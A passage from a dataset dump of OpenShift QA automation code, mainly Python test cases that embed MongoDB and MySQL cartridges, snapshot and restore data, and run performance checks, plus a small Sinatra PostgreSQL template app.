expect_return=0,\n            expect_description=\"App should be created successfully\"))\n\n#this will be as __OUTPUT__[2]\n        self.steps_list.append(testcase.TestCaseStep(\"Get app url\",\n                OSConf.get_app_url_X,\n                function_parameters = [self.app_name]))\n\n#this will be as __OUTPUT__[3]\n        self.steps_list.append(testcase.TestCaseStep(\"Get app uuid\",\n                OSConf.get_app_uuid_X,\n                function_parameters = [self.app_name]))\n\n        #4\n        self.steps_list.append(testcase.TestCaseStep(\"Embed MongoDB to this app\",\n            common.embed,\n            function_parameters=[self.app_name, \n                    \"add-%s\"%common.cartridge_types['mongodb'], \n                    self.config.OPENSHIFT_user_email, \n                    self.config.OPENSHIFT_user_passwd],\n            expect_return=0))\n\n        #5\n        self.steps_list.append(testcase.TestCaseStep(\"Get embedded mongo info - password\",\n            OSConf.get_embed_info_X,\n            function_parameters=[self.app_name, common.cartridge_types[\"mongodb\"], \"password\"]))\n\n        #6\n        self.steps_list.append(testcase.TestCaseStep(\"Get embedded mongo info - url\",\n            OSConf.get_embed_info_X,\n            function_parameters=[self.app_name, common.cartridge_types[\"mongodb\"], \"url\"]))\n\n        mongo_shell_write_input_file = \"./mongo_shell_write_input\"\n        mongo_shell_read_input_file = \"./config.mongo_shell_read_input\"\n        test_Collection_name = \"test\"\n        test_data = \"TesterName\"\n\n        #7\n        command = \"\"\"echo -e 'use %s\\ndb\\nshow collections\\ndb.%s.save({\"name\":\"%s\"})\\nexit\\n' >%s\"\"\" %(self.app_name, test_Collection_name, test_data, mongo_shell_write_input_file)\n        self.steps_list.append(testcase.TestCaseStep(\"Write mongo shell input file - write\",\n            command, \n            expect_return=0))\n\n        command = \"\"\"echo -e 'use %s\\ndb\\nshow collections\\ndb.%s.find()\\nexit\\n' >%s\"\"\" %(self.app_name, test_Collection_name, mongo_shell_read_input_file)\n        #8\n        self.steps_list.append(testcase.TestCaseStep(\"Write mongo shell input file - read\",\n            command,\n            expect_return=0))\n\n        #9\n        self.steps_list.append(testcase.TestCaseStep(\"Do some write operation to mongodb\",\n            \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n            #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_write_input_file), \n            string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n                                 OSConf.get_app_url_X(self.app_name), \n                                 mongo_shell_write_input_file],\n            expect_return=0,\n            expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", self.app_name],\n            unexpect_string_list=[\"errmsg\"]))\n\n        #10\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Do some query operation to mongodb to check write operation is successful\",\n            \"\"\"ssh -t -t %s@%s rhcsh mongo < 
%s\"\"\", \n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", app_name, test_Collection_name, test_data],\n unexpect_string_list=[\"errmsg\"]))\n\n #11\n self.steps_list.append(testcase.TestCaseStep(\"Stop this embed db using 'rhc cartridge stop'\",\n \"rhc cartridge stop %s -a %s -l %s -p '%s' %s\" \n %(common.cartridge_types['mongodb'], app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS), \n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check this db status\",\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" %(common.cartridge_types['mongodb'], app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,\n expect_string_list=[\"MongoDB is stopped\"]))\n\n #12\n self.steps_list.append(testcase.TestCaseStep(\n \"Try to do some query operation to mongodb to check db is NOT running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return = \"!0\",\n expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", \"connect failed\"],\n unexpect_string_list=[test_data,]))\n\n #13\n self.steps_list.append(testcase.TestCaseStep(\"Start this embed db using 'rhc cartridge start'\",\n \"rhc cartridge start %s -a %s -l %s -p '%s' %s\" \n %(common.cartridge_types['mongodb'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n #14\n self.steps_list.append(testcase.TestCaseStep(\"Check this db status\",\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" %(common.cartridge_types['mongodb'], app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,\n expect_string_list=[\"MongoDB is running\"]))\n\n #15\n self.steps_list.append(testcase.TestCaseStep(\n \"Do some query operation to mongodb to check db is running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \n \"MongoDB shell\", \n self.app_name, \n test_Collection_name, \n test_data],\n unexpect_string_list=[\"errmsg\"]))\n\n #16\n self.steps_list.append(testcase.TestCaseStep(\"Re-start this embed db using 'rhc cartridge restart'\",\n \"rhc cartridge restart %s -a %s -l %s -p '%s' %s\" \n %(common.cartridge_types['mongodb'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n #17\n self.steps_list.append(testcase.TestCaseStep(\n \"Do some query operation to mongodb to check db is running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\",\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n 
OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \n \"MongoDB shell\", \n self.app_name, \n test_Collection_name, \n test_data],\n unexpect_string_list=[\"errmsg\"]))\n\n #18\n self.steps_list.append(testcase.TestCaseStep(\"Reload this embed db using 'rhc cartridge reload'\",\n \"rhc cartridge reload %s -a %s -l %s -p '%s' %s\" %(common.cartridge_types['mongodb'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n #19\n self.steps_list.append(testcase.TestCaseStep(\n \"Do some query operation to mongodb to check db is running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", self.app_name, test_Collection_name, test_data],\n unexpect_string_list=[\"errmsg\"]))\n\n #20\n self.steps_list.append(testcase.TestCaseStep(\"Remove MongoDB from this app\",\n common.embed,\n function_parameters=[app_name, \n \"remove-%s\"%common.cartridge_types[\"mongodb\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n if self.environment == \"STG\":\n _expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", \"connect failed\"]\n else:\n _expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\"]\n\n #21\n self.steps_list.append(testcase.TestCaseStep(\n \"Try to do some query operation to mongodb to check db is NOT running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n# expect_return=\"!0\",\n expect_string_list=_expect_string_list,\n unexpect_string_list=[test_data]))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddControlRemoveMongodb)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6377473473548889, "alphanum_fraction": 0.6537290811538696, "avg_line_length": 31.04878044128418, "blob_id": "f831d3883b36431095254c4a2f57d0461c3cd310", "content_id": "02a55411eed9a000679be6a5283a4c25071fa9c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1314, "license_type": "no_license", "max_line_length": 65, "num_lines": 41, "path": "/automation/open/testmodules/UI/web/US1797_135720.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport 
HTMLTestRunner\n\nclass US1797135720(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n \n def test_u_s1797135720(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n\n baseutils.delete_sshkey(self, \"default\")\n (priv, pub) = baseutils.gen_sshkey()\n key_name = \"key\"+baseutils.get_random_str(3)\n baseutils.add_sshkey(self, key_name, pub)\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5961775183677673, "alphanum_fraction": 0.6077607870101929, "avg_line_length": 64.4644546508789, "blob_id": "a252eb1e71b643a8488c7f16720ec36a8486087c", "content_id": "bbac9edad4bf4b8b59bf784b4e3278a942f80060", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13813, "license_type": "no_license", "max_line_length": 595, "num_lines": 211, "path": "/automation/open/testmodules/RT/cartridge/snapshot_restore_mysql_existing_scalable_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nJun 27, 2012\n[US2003][RT]Snapshot and restore MySQL data to existing scalable jbossas-7 app\n[US2003][RT]Snapshot and restore MySQL data to existing scalable jbosseap-6.0 app\n[US2004][RT]Snapshot and restore MySQL data to existing scalable php-5.3 app\n[US2004][RT]Snapshot and restore MySQL data to existing scalable perl-5.10 app\n[US2005][RT]Snapshot and restore MySQL data to existing scalable python-2.6 app\n[US2006][RT]Snapshot and restore MySQL data to existing scalable ruby-1.8 app\n[US2006][RT]Snapshot and restore MySQL data to existing scalable ruby-1.9 app\n[US2007][RT]Snapshot and restore MySQL data to existing scalable nodejs-0.6 app\n\"\"\"\nimport common, testcase, OSConf\nimport rhtest\nimport subprocess, commands\nimport re, os, time\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = ['DEV', 'INT', 'STG']\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n self.steps_list = []\n self.summary = \"\"\"[US2003][RT]Snapshot and restore MySQL data to existing scalable jbossas-7 app\n[US2003][RT]Snapshot and restore MySQL data to existing scalable jbosseap-6.0 app\n[US2004][RT]Snapshot and restore MySQL data to existing scalable php-5.3 app\n[US2004][RT]Snapshot and restore MySQL data to existing scalable perl-5.10 app\n[US2005][RT]Snapshot and restore MySQL data to existing scalable python-2.6 app\n[US2006][RT]Snapshot and restore MySQL data to existing scalable ruby-1.8 app\n[US2006][RT]Snapshot and restore MySQL data to existing scalable ruby-1.9 app\n[US2007][RT]Snapshot and restore MySQL data to existing scalable nodejs-0.6 app\"\"\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = \"ruby\"\n self.domain_name = common.get_domain_name()\n self.app_name = \"snapshot\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = self.app_name\n 
common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreMysqlScalableTest(OpenShiftTest):\n\n def modify_app(self):\n self.mysql_user = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"username\"]\n self.mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"password\"]\n self.mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"database\"]\n self.mysql_host = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"url\"]\n self.mysql_port = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"port\"]\n if self.test_variant in (\"jbossas\", \"jbosseap\", \"jbossews\", \"jbossews2\"):\n cmd = \"cd '%s/src/main/webapp/' && cp '%s/app_template/bigdata/mysql/mysql.jsp' . && mkdir WEB-INF/lib && cp '%s/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar' WEB-INF/lib && sed -i -e 's/#host/%s/g' mysql.jsp && sed -i -e 's/#port/%s/g' mysql.jsp && sed -i -e 's/#dbname/%s/g' mysql.jsp && sed -i -e 's/#user/%s/g' mysql.jsp && sed -i -e 's/#passwd/%s/g' mysql.jsp && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"python\":\n cmd = \"cd '%s/wsgi/' && cp '%s/app_template/bigdata/mysql/application' . && sed -i -e 's/#host/%s/g' application && sed -i -e 's/#port/%s/g' application && sed -i -e 's/#dbname/%s/g' application && sed -i -e 's/#user/%s/g' application && sed -i -e 's/#passwd/%s/g' application && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"python-2.7\":\n cmd = \"cd '%s/wsgi/' && cp -f '%s/app_template/bigdata/mysql/application27' application && sed -i -e \\\"s/#\\s*'MySQL-python',/'MySQL-python',/g\\\" ../setup.py && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR)\n elif self.test_variant == \"php\":\n cmd = \"cd '%s/php/' && cp '%s/app_template/bigdata/mysql/mysql.php' . && sed -i -e 's/#host/%s/g' mysql.php && sed -i -e 's/#port/%s/g' mysql.php && sed -i -e 's/#dbname/%s/g' mysql.php && sed -i -e 's/#user/%s/g' mysql.php && sed -i -e 's/#passwd/%s/g' mysql.php && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"perl\":\n cmd = \"cd '%s/perl/' && cp '%s/app_template/bigdata/mysql/mysql.pl' . && sed -i -e 's/#host/%s/g' mysql.pl && sed -i -e 's/#port/%s/g' mysql.pl && sed -i -e 's/#dbname/%s/g' mysql.pl && sed -i -e 's/#user/%s/g' mysql.pl && sed -i -e 's/#passwd/%s/g' mysql.pl && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"nodejs\":\n cmd = \"cd '%s/' && cp '%s/app_template/bigdata/mysql/server.js' . && sed -i -e 's/#host/%s/g' server.js && sed -i -e 's/#port/%s/g' server.js && sed -i -e 's/#dbname/%s/g' server.js && sed -i -e 's/#user/%s/g' server.js && sed -i -e 's/#passwd/%s/g' server.js && git add . 
&& git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant == \"ruby\" or self.test_variant == \"ruby-1.9\":\n cmd = \"cd '%s/' && cp %s/app_template/bigdata/mysql/{config.ru,Gemfile} . ; bundle check ; bundle install ; sed -i -e 's/#host/%s/g' config.ru && sed -i -e 's/#port/%s/g' config.ru && sed -i -e 's/#dbname/%s/g' config.ru && sed -i -e 's/#user/%s/g' config.ru && sed -i -e 's/#passwd/%s/g' config.ru && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n (ret, output) = common.command_getstatusoutput(cmd)\n return ret\n\n def insert_data(self, size):\n self.app_url = OSConf.get_app_url(self.app_name)\n size = str(size)\n url_suffix = { \"jbossas\" : \"/mysql.jsp?action=insert&size=%s\" % (size),\n \"python\" : \"/insert?size=%s\" % (size),\n \"php\" : \"/mysql.php?action=insert&size=%s\" % (size),\n \"perl\" : \"/mysql.pl?action=insert&size=%s\" % (size),\n \"nodejs\" : \"/insert?size=%s\" % (size),\n \"ruby\" : \"/mysql?action=insert&size=%s\" % (size),\n }\n url_suffix[\"python-2.7\"] = url_suffix[\"python\"]\n url_suffix[\"jbosseap\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews2\"] = url_suffix[\"jbossas\"]\n url_suffix[\"ruby-1.9\"] = url_suffix[\"ruby\"]\n url = self.app_url + url_suffix[self.test_variant]\n ret = common.grep_web_page(url, \"%s records have been inserted into mysql\" % (size), \"-H 'Pragma: no-cache' -L\", 5, 8)\n return ret\n\n def delete_data(self):\n url_suffix = { \"jbossas\" : \"/mysql.jsp?action=delete\",\n \"python\" : \"/delete\",\n \"php\" : \"/mysql.php?action=delete\",\n \"perl\" : \"/mysql.pl?action=delete\",\n \"nodejs\" : \"/delete\",\n \"ruby\" : \"/mysql?action=delete\",\n }\n url_suffix[\"python-2.7\"] = url_suffix[\"python\"]\n url_suffix[\"jbosseap\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews2\"] = url_suffix[\"jbossas\"]\n url_suffix[\"ruby-1.9\"] = url_suffix[\"ruby\"]\n url = self.app_url + url_suffix[self.test_variant]\n ret = common.grep_web_page(url, \"All the records have been deleted from mysql database\", \"-H 'Pragma: no-cache' -L\", 5, 8)\n return ret\n\n def check_data(self, regex):\n url_suffix = { \"jbossas\" : \"/mysql.jsp?action=show\",\n \"python\" : \"/show\",\n \"php\" : \"/mysql.php?action=show\",\n \"perl\" : \"/mysql.pl?action=show\",\n \"nodejs\" : \"/show\",\n \"ruby\" : \"/mysql?action=show\",\n }\n url_suffix[\"python-2.7\"] = url_suffix[\"python\"]\n url_suffix[\"jbosseap\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews\"] = url_suffix[\"jbossas\"]\n url_suffix[\"jbossews2\"] = url_suffix[\"jbossas\"]\n url_suffix[\"ruby-1.9\"] = url_suffix[\"ruby\"]\n url = self.app_url + url_suffix[self.test_variant]\n ret = common.grep_web_page(url, regex, \"-H 'Pragma: no-cache' -L\", 5, 8, True)\n return ret\n \n\n def test_method(self):\n size = 10\n # 1. Create app\n self.steps_list.append(testcase.TestCaseStep(\"Create an %s app: %s\" % (self.test_variant, self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", True],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2. 
Embed mysql to it\n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql-5.1 to it\",\n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"mysql should be embedded successfully\",\n expect_return=0))\n # 3. Copy the sample app to git repo and git push\n self.steps_list.append(testcase.TestCaseStep(\"Copy the sample app to git repo and git push\",\n self.modify_app,\n expect_description=\"The git repo should be modified and git push\",\n expect_return=0))\n # 4. Visit the 'insert' page to insert data into mysql\n self.steps_list.append(testcase.TestCaseStep(\"Visit the 'insert' page to insert data into mysql\",\n self.insert_data,\n function_parameters=[size],\n expect_description=\"The data should be inserted into mysql\",\n expect_return=0))\n # 5. Check the data has been inserted\n self.steps_list.append(testcase.TestCaseStep(\"Check the data has been inserted\",\n self.check_data,\n function_parameters=[[r\"There are \\d+ records in database\", r\"This is testing data for testing snapshoting and restoring big data in mysql database\"],],\n expect_description=\"The data should be inserted into mysql\",\n expect_return=0))\n # 6. Save snapshot of the app\n self.steps_list.append(testcase.TestCaseStep(\"Save snapshot of the app\",\n \"rhc snapshot save %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"Snapshot should be saved\",\n expect_return=0))\n # 7.Delete the data \n self.steps_list.append(testcase.TestCaseStep(\"Delete the data\",\n self.delete_data,\n expect_description=\"The data in mysql database should be deleted\",\n expect_return=0))\n # 8. Check the data has been deleted\n self.steps_list.append(testcase.TestCaseStep(\"Check the data has been deleted\",\n self.check_data,\n function_parameters=[\"There is no record in database\",],\n expect_description=\"The data should be deleted from mysql\",\n expect_return=0))\n # 9. Use the tarball to restore the app\n self.steps_list.append(testcase.TestCaseStep(\"Use the tarball to restore the app\",\n \"rhc snapshot restore %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The data should be restored\",\n expect_return=0))\n # 10. 
Check the data to see if it's restored\n self.steps_list.append(testcase.TestCaseStep(\"Check the data to see if it's restored\",\n self.check_data,\n function_parameters=[[\"There are \\d+ records in database\", \"This is testing data for testing snapshoting and restoring big data in mysql database\"],],\n expect_description=\"The data should be restored\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMysqlScalableTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5476034283638, "alphanum_fraction": 0.5505580902099609, "avg_line_length": 30.081632614135742, "blob_id": "73f488d03a828435b51b3a6662a74f6dda4c5b7f", "content_id": "74c3ed20121e72100ba72b1c47c2d324daf3cb0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3046, "license_type": "no_license", "max_line_length": 79, "num_lines": 98, "path": "/automation/open/testmodules/RT/perf/perf.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport uuid\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.instance_ip = self.config.instance_info['ip']\n self.rest = openshift.Openshift(host=self.instance_ip)\n self.perf_results = {}\n \n def finalize(self):\n pass\n \n def record_results(self, resid):\n for k, v in self.perf_results.items():\n print \"K: %s, V: %s\" % (k,v)\n #action = database.get_perf_action_id(k)\n res = database.PerfResults(TestResultsID=resid, ActionID=k, \n ActionTime=v[0], GearSize=v[1])\n print res.id\n\n\nclass Performance(OpenShiftTest):\n def test_method(self):\n errorCount = 0\n li = self.rest\n #self.info(\"xxx\", 1)\n #perf_results = {}\n # setup a valid domain first\n #print \"###########################\"\n self.info(\"Domain performance\")\n domain_name = \"test%s\" % uuid.uuid1().hex[:6]\n action = 'domain_create'\n method_call = getattr(li, action)\n manifest_id = database.get_perf_action_id(action, None)\n status, res = method_call(domain_name)\n self.perf_results[manifest_id] = res\n\n app_params_dict = self.config.app_params\n app_params = openshift.sortedDict(app_params_dict)\n for cart in self.config.cart_types:\n for action in app_params:\n manifest_id = database.get_perf_action_id(action['name'], cart)\n #perf_results[mainfest_id] = None\n method_call = getattr(li, action['name'])\n k, v = action['params'].items()[0]\n if action['name'] == 'app_create':\n status, res = method_call(v, cart)\n elif action['name'] == 'app_create_scale':\n status, res = method_call(v, cart, 'true')\n else:\n status, res = method_call(v)\n # finally get the gear information\n try:\n gear_info, gear_size = li.get_gears(v)\n except:\n gear_size = 1\n self.perf_results[manifest_id] = [res, gear_size]\n #self.info(\"xx\", 1)\n \"\"\"\n action = 'domain_delete'\n 
method_call = getattr(li, action)\n manifest_id = database.get_perf_action_id(action, None)\n status, res = method_call(domain_name)\n self.perf_results[manifest_id] = res\n \n \"\"\"\n\n if errorCount:\n return self.failed(\"Performance test failed.\")\n else:\n return self.passed(\"Performance test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Performance)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6450130939483643, "alphanum_fraction": 0.6502624750137329, "avg_line_length": 25.736841201782227, "blob_id": "aab88213b2449807ff1f77f9acba70ea0850f14d", "content_id": "c3c2b35548111717b8e464b075c81cf51f9f5a4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1524, "license_type": "no_license", "max_line_length": 214, "num_lines": 57, "path": "/automation/open/testmodules/RT/cartridge/app_template/postgresql/rack/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# contents of 'config.ru'\nrequire 'rubygems'\nrequire 'bundler'\nrequire 'pg'\n\nBundler.require\n\n#conn_str = \"dbname=#pgsql_dbname# user=#pgsql_user# password=#pgsql_passwd# host=#pgsql_host# port=#pgsql_port#\"\n\nconn_str = \"dbname=#{ENV['OPENSHIFT_APP_NAME']} user=#{ENV['OPENSHIFT_POSTGRESQL_DB_USERNAME']} password=#{ENV['OPENSHIFT_POSTGRESQL_DB_PASSWORD']} host=#{ENV['OPENSHIFT_POSTGRESQL_DB_HOST']} port=#{ENV['OPENSHIFT_POSTGRESQL_DB_PORT']}\"\n\nget '/' do\n \"the time where this server lives is #{Time.now}\n <br /><br />check out your <a href=\\\"/agent\\\"> user_agent</a>\"\nend\n\nget '/show.rb' do\n\n begin\n conn = PGconn.open(conn_str)\n res = conn.exec(\"SELECT data from info;\")\n response_body = res.getvalue(0,0)\n conn.finish()\n end\n\n \"#{response_body}\"\nend\n\nget '/data1.rb' do\n\n begin\n conn = PGconn.open(conn_str)\n res = conn.exec(\"DROP TABLE IF EXISTS info;\")\n res = conn.exec(\"CREATE TABLE info(id integer PRIMARY KEY, data text);\")\n res = conn.exec(\"INSERT INTO info VALUES(1, '#str_random1#');\")\n response_body = \"Please visit /show.rb to see the data\"\n conn.finish()\n end\n\n \"#{response_body}\"\nend\n\nget '/data2.rb' do\n\n begin\n conn = PGconn.open(conn_str)\n res = conn.exec(\"DROP TABLE IF EXISTS info;\")\n res = conn.exec(\"CREATE TABLE info(id integer PRIMARY KEY, data text);\")\n res = conn.exec(\"INSERT INTO info VALUES(1, '#str_random2#');\")\n response_body = \"Please visit /show.rb to see the data\"\n conn.finish()\n end \n\n \"#{response_body}\"\nend\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6729622483253479, "alphanum_fraction": 0.6729622483253479, "avg_line_length": 27.742856979370117, "blob_id": "777b35ad197a2184268fc3b0b5c2d04366ce54a0", "content_id": "af8078d875193f84fb6285734e0e2e4cb7b13d5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1006, "license_type": "no_license", "max_line_length": 86, "num_lines": 35, "path": "/automation/open/testmodules/RT/quick_start/quick_start_django.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\n# user defined packages\nfrom quick_start_test import 